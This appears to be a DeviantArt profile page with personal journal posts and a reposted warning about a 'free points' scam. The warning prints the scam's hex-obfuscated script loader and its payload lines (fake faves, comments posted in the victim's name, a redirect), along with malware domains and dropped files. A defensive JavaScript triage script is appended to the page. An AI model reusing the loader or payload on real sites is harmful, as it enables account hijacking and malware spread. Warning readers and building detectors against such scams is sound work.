
RedSwordAngel

Freedom is expensive
37 Watchers, 153 Deviations, 19.4K Pageviews

Good Afternoon, RedLeather!


It has been quite some time since my last post - you'll have to forgive me as it seems I am still alone in running this. Life became a little crazy and I personally am trying to finish a degree. I won't abandon this group. I am all ears for your thoughts and opinions as to what we should do and how to collaborate activities within the club. I am thinking of everyone here as we remain a club and family among the hardship of COVID-19. If you ever need support, you can surely find it here in RedLeather - especially with me, you can always DM me!


Darkness aside however, rejoice for within the past couple days or so, I am SURE you all are playing the Final Fantasy VII: Remake! It is finally in our possession and I hope you enjoy the game, please be sure to keep your posts spoiler free if you can help it. We are all excited to see where the Remake will go.


Keep Genesis and LOVELESS in your thoughts. I cannot wait to hear from everyone soon!


- Red

Is anyone selling their FF7 Loveless Locket? Please help, I'd love it for cosplay.

SWAT

2 min read
HAHAHA.

So in this past week, I almost died. It went as far as involving the SWAT team. Yeah, talk about gnarly. So hi guys! I'm still alive, I'm going back to school and I'll be here in a little more. I'll be in art class (so yay finally art stuff!) and hopefully, I'll be uploading costumes in progress because I'm in a costume class too. What's happening this year for me? School. I'm also house shopping in Bellevue so my special lady and I can get an idea of where exactly we can live and afford to thrive. We're figuring out little things like transportation, house warming things, and how close we can enclose the living together ordeal. She's almost done with school so it may be closer than I thought. :heart:

I'm finally back on DA, hopefully around a little more to show off my future works of art. Life has been hectic. I have nearly died, lost my home and its utilities, got in a fight - jamming three fingers and ruining my left shoulder, lost my pets, lost my job, and lost my opportunity to go to school. That's a little too much for me to be losing, things have been hell on wheels. I also discovered there are a lot of things wrong with me and the school offered to evaluate me further. That's sort of scary but I can see the root of why.

Anyway, I sit here, hopefully someone watches or reads these things from me. My Great Dane puppy sleeps on the couch with me as I do this. We're both content as I type away, talking to my lady on Skype. It's a decent, quiet night. There shall be Hell in the morning.
I took this from :iconpetersong:

Stop the "Get 20K points" invasion


Before you do anything stupid, please read this

Obviously, this offer is swindling.
And as such it is dangerous for you!


What it does

"\x61" is just another way to write "a" (ISO hexadecimal encoding)

Thus,

["\x73\x72\x63","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x79","\x68\x74\x74\x70\x3A\x2F\x2F\x64\x65\x76\x69\x61\x6E\x74\x61\x72\x74\x2E\x68\x70\x2E\x61\x66\x2E\x63\x6D\x2F\x67\x65\x6E\x65\x72\x61\x74\x6F\x72\x2F\x6D\x69\x78\x2E\x6A\x73"]

is just written words. Script actually.

You can have it safely translated by using the "unescape" JavaScript function, on this part of the script only.

Once translated, this script does one thing: it includes a bigger, more elaborate script as being part of the DA page.

This script can be found here:
deviantart.hp.af.cm/generator/…

This script will now be able to act in your name

Note that this script is NOT hosted by deviantart.com website. It is a foreign website, hosted in Cameroon (Africa), in such a way that the smugglers can't be found by regular simple investigations. They are hiding, and hiding well.

This new script does something else.
For now (but it might change):

document.getElementById("gmi-ResourceViewFaveButton").click();
It simulates a click on the "Fave" button.

document.getElementById("commentbody").value="It actually works! Wohoooooooo! Thanks!";
It writes (in your name) a fake comment saying "It actually works! Wohoooooooo! Thanks!".

setTimeout("document.getElementsByClassName('ll f')[0].click()", 100);
It programs something that will hide these actions by reopening the comment area once it is posted.

document.getElementsByClassName("smbutton smbutton-blue smbutton-big comment-submit")[0].click();
It validates the comment (in your name).

window.top.location.href='deviantart.hp.af.cm/generator';
alert('DeviantART: Welcome to deviantART\'s Points Generator! You will be redirected to our generator. Click OK to proceed')
It programs a redirection to their website and displays an alert that says "DeviantART: Welcome to deviantART\'s Points Generator! You will be redirected to our generator. Click OK to proceed"

And then what?

And then you won't get any DA points, indeed. I bet you guessed already…

Instead, they will say to you "Oh, you don't have this so great plugin, come and download it!", and launch the download anyway. And this is where you get screwed if you are gullible enough to run an executable file from a random site hidden in Cameroon…
I don't know (yet) what this exe file does. But I know what it could do.
First of all, it might be (and probably is) a security breach on your computer: Trojan, virus, remote agent…
Which in turn could be aimed at several things: spreading this publication so that others get screwed, stealing personal information (such as payment card numbers), using your computer as a proxy for network attacks…

If you already downloaded the file, please, be very careful. Use antiviral detection and malware removal on your computer now, and in a few days. Firewall protection is a must have.
The malware might steal your "cookie" too. This means that your password might be compromised. Actually not only for deviantArt.

What can we do?

For now, we can try to warn and inform people.
Try to make them stop spreading this stupid hoax.
If you have any idea of what more to do, please, comment.

OMG my brother did it!

I did not download/run that exe file, am I safe?

As far as I know

   There was no harmful code in the JavaScript stuff that I saw, but it can change at any time
   Any reasonable browser should not be able to execute a downloaded file without warning you before (and the "plugin" stuff is AFAIK only fake div displayed as part of the internet webpage, then not harmful)
   I think that the only thing really endangered by the JavaScript is your session cookie, then changing your password might be wise.
   I have heard of other more sophisticated attacks like buffer overflowing and stuff, but I'm not competent enough to tell you if there is such a threat. Then consider you are not safe until someone can tell us whether there is such a potential threat.


Thus I would say that as far as I know, you should be relatively safe, but I also know that this is a huge field and that I'm no pro. So you should consider being careful, and having antiviral + firewall protection up to date on your computer (as everyone else).

Connected Viruses/Malware/Adware identified

One or several of these malwares might have been dropped on your computer if you had this exe file run on your computer:

   Trojan
       Identified by Emsisoft as Trojan.MSIL.Spy.Agent.AMN (A)
       Identified by Fortinet as MSIL/Agent.HG!tr.spy
       Identified by ESET-NOD32 as a variant of MSIL/Spy.Agent.HG
       Identified by many other malware detectors as Trojan.GenericKD.966175
       This is a serious threat
       This is a Trojan, which means it is a malicious software spying on your computer and sending (or giving access to) this data to malicious people. See the Internet Holy Bible for reference.
       Some antivirus programs are free. See the Mighty Source of all Truth for reference.
       Fresh news here thanks to ~krisiskiller101 investigations !
           He was able to get rid of it using MalwareBYTES
           He confirmed that RASMan service was up on his computer. Though, this service is not supposed to be harmful and might have been up before. It might also be part of the trojan attack that was not turned back up by the fix because it is not harmful alone.
           Thanks for the info !
   AdWare.iBryte.H
       seems to be a recent version of the well-known adware iBryte
       Only Comodo antimalware seems to identify it. Maybe ESET-NOD32 too.
       Be very careful as searching for "iBryte.H removal" can lead to spywareprotectiontool.com which is a malicious website giving you malware instead of solutions
       You can find instructions for this adware removal, searching for "iBryte removal", but I don't know if they would work with this version of the adware (please, tell us if you have any success with one of these procedure)
   Optimum Installer (fs)
       Might be a false positive
       There is plenty of removal instruction tutorials (please, tell us if you have any success with one of them)



Personal investigations

I don't have a packed solution. And I won't probably have time enough to investigate this stuff thoroughly.
Yet, I found some hints, by diving modestly into this sh*t. I share it for people it might help.
This program does the following:

   It messes up your registry in a theatrical way
       It probably affects the download manager associated with your web browser
       It probably affects the toolbars in your web browser
       Writes 'test' everywhere in the registry
       Messes with your IE cache
   Creates files
       Creates an executable file named "D2M-Precheck.exe", hidden in "C:\Document and settings\Your_User_Name\Local Settings\Temp"
       Creates an executable file named "check_offer_rp.dll", hidden in "C:\Document and settings\Your_User_Name\Local Settings\Temp"
       Creates copies of these two files in a subdirectory of "C:\Document and settings\Your_User_Name\Local Settings\Temporary Internet Files\Content.IE5\"
   Runs the created exe file, which in turn spoils your computer:
       Creates a new "exe" file named "Impressioner.exe" along with a "System.Data.SQLite.dll" and "imp.dat" files, hidden at the same place : "C:\Document and settings\Your_User_Name\Local Settings\Temp"
   Transfers data through the internet with the following addresses
       imp.oi-imp1.com
       config.oi-config1.com
       d1uc4fr8hoy8ts.cloudfront.net
       cdn.install.oibundles2.com (the only thing done here is downloading the dll file stated before)
       cache-download.real.com
       d2m.adk-mobile.com
   Probably displays advertising



Be careful: this is not an exhaustive list. And all that is listed above is not necessarily harmful (e.g. SQLite.dll is just a database they use, not a virus itself, probably). Do not edit your Registry if you don't know exactly what you are doing.
Moreover, I have no idea of what this "impressioner.exe" does. Then there might be a lot more mess to clean. By the way, if you were infected and are able to find this file, please, consider sending a copy of it to me.
-edit- Okay, it will be hard to find this file on your drive: this file "does something" (including turning up RASMAN Service) and deletes itself. This is really not comforting.

This said, and with no guarantee of any kind, "do it at your own risks" and stuff, I think that you can safely delete the exe and dll files mentioned above. It might rid you of part of the infection.

If you have more information or if you can teach me something on this kind of investigation, please, contact me, I will update.
This information might even be wrong depending on your OS and configuration!


Thanks for reading!

Pass it on!
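The obfuscated array from the "What it does" section and the domains and dropped-file names from "Personal investigations", worked into one small triage script. This is an added example, not code from the journal or from :iconpetersong:. It decodes the \xNN-escaped array to recover the off-site script host, combines that host with the listed indicators, and runs constructed DNS/file log lines against them. The expected site host ('deviantart.com') and the "timestamp kind value" log format are assumptions made for this example.

```javascript
// Added example: not code from the journal or from its original author.
// Defender-side triage of the "20K points" scam:
//   1. decode the \xNN-obfuscated array to recover the off-site script URL,
//   2. merge that host with the domains and dropped-file names the journal
//      lists under "Personal investigations" into one indicator set,
//   3. match constructed DNS/file log lines against that set.
// The expected site host and the log format are assumptions for this example.

// The obfuscated array, copied from the journal. String.raw keeps the
// backslashes literal so the decoding below is really exercised.
const OBFUSCATED = String.raw`["\x73\x72\x63","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x79","\x68\x74\x74\x70\x3A\x2F\x2F\x64\x65\x76\x69\x61\x6E\x74\x61\x72\x74\x2E\x68\x70\x2E\x61\x66\x2E\x63\x6D\x2F\x67\x65\x6E\x65\x72\x61\x74\x6F\x72\x2F\x6D\x69\x78\x2E\x6A\x73"]`;

// Network and file indicators exactly as the journal lists them.
const LISTED_DOMAINS = [
  'imp.oi-imp1.com', 'config.oi-config1.com', 'd1uc4fr8hoy8ts.cloudfront.net',
  'cdn.install.oibundles2.com', 'cache-download.real.com', 'd2m.adk-mobile.com',
];
const DROPPED_FILES = ['D2M-Precheck.exe', 'check_offer_rp.dll',
  'Impressioner.exe', 'imp.dat'];

// Replace every \xNN escape with the character it stands for.
function decodeHexEscapes(text) {
  return text.replace(/\\x([0-9A-Fa-f]{2})/g,
    (_, hh) => String.fromCharCode(parseInt(hh, 16)));
}

// After decoding, the array is plain JSON and can be parsed directly.
function decodeArray(obfuscated) {
  return JSON.parse(decodeHexEscapes(obfuscated));
}

// True when hostname is the indicator domain or a subdomain of it
// ('evildeviantart.com' must not match 'deviantart.com').
function hostMatches(hostname, domain) {
  const h = hostname.toLowerCase();
  const d = domain.toLowerCase();
  return h === d || h.endsWith('.' + d);
}

// Decoded strings that are absolute URLs pointing outside expectedHost.
function findOffSiteHosts(strings, expectedHost) {
  const hosts = [];
  for (const s of strings) {
    let url;
    try { url = new URL(s); } catch (e) { continue; } // 'src', 'body', ... are not URLs
    if (!hostMatches(url.hostname, expectedHost)) hosts.push(url.hostname);
  }
  return hosts;
}

// Indicator set: decoded off-site hosts first, then the journal's own list.
function buildIndicators(obfuscated, expectedHost) {
  const offSite = findOffSiteHosts(decodeArray(obfuscated), expectedHost);
  return {
    domains: [...offSite, ...LISTED_DOMAINS],
    files: DROPPED_FILES.map((f) => f.toLowerCase()),
  };
}

// Constructed sample log (not real data): "timestamp kind value", kind is dns or file.
const SAMPLE_LOG = `
2013-05-01T10:00:01Z dns www.deviantart.com
2013-05-01T10:00:02Z dns deviantart.hp.af.cm
2013-05-01T10:00:03Z dns CDN.install.oibundles2.com
2013-05-01T10:00:04Z file C:\\Documents and Settings\\alice\\Local Settings\\Temp\\D2M-Precheck.exe
2013-05-01T10:00:05Z dns updates.example.org
2013-05-01T10:00:06Z file C:\\Documents and Settings\\alice\\My Documents\\notes.txt
2013-05-01T10:00:07Z dns d2m.adk-mobile.com
`;

// One hit per log line whose value matches an indicator.
function matchLog(logText, indicators) {
  const hits = [];
  for (const raw of logText.split('\n')) {
    const m = raw.trim().match(/^(\S+)\s+(\S+)\s+(.+)$/);
    if (!m) continue; // blank or malformed line
    const [, ts, kind, value] = m;
    let indicator;
    if (kind === 'dns') {
      indicator = indicators.domains.find((d) => hostMatches(value, d));
    } else if (kind === 'file') {
      // Compare only the file name, case-insensitively, whatever the directory.
      const base = value.split(/[\\\/]/).pop().toLowerCase();
      if (indicators.files.includes(base)) indicator = base;
    }
    if (indicator) hits.push({ ts, kind, value, indicator });
  }
  return hits;
}

const indicators = buildIndicators(OBFUSCATED, 'deviantart.com');
console.log(indicators.domains);
console.log(matchLog(SAMPLE_LOG, indicators));
```

The decoded array is exactly the list of DOM names the journal describes plus the foreign script URL, which is why the first indicator comes out of the decoder rather than being typed in by hand. Domain matching is suffix-based on a dot boundary so that subdomains of a listed host are caught without a look-alike domain matching the expected site.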

Snap!

3 min read
Alright, I'm not afraid to ask for help. I've been made a leader of a group (teehee, anyone notice?) so if you're a part of it or you want to help me keep it alive, by all means please do! Remember me kindly! :heart: As for other things, I'm going to try and contribute more here. Let's see what I can do with my spare time, yes?

Otherwise, please send me notes and tell me hello... It does not hurt if people acknowledge my small existence. X3
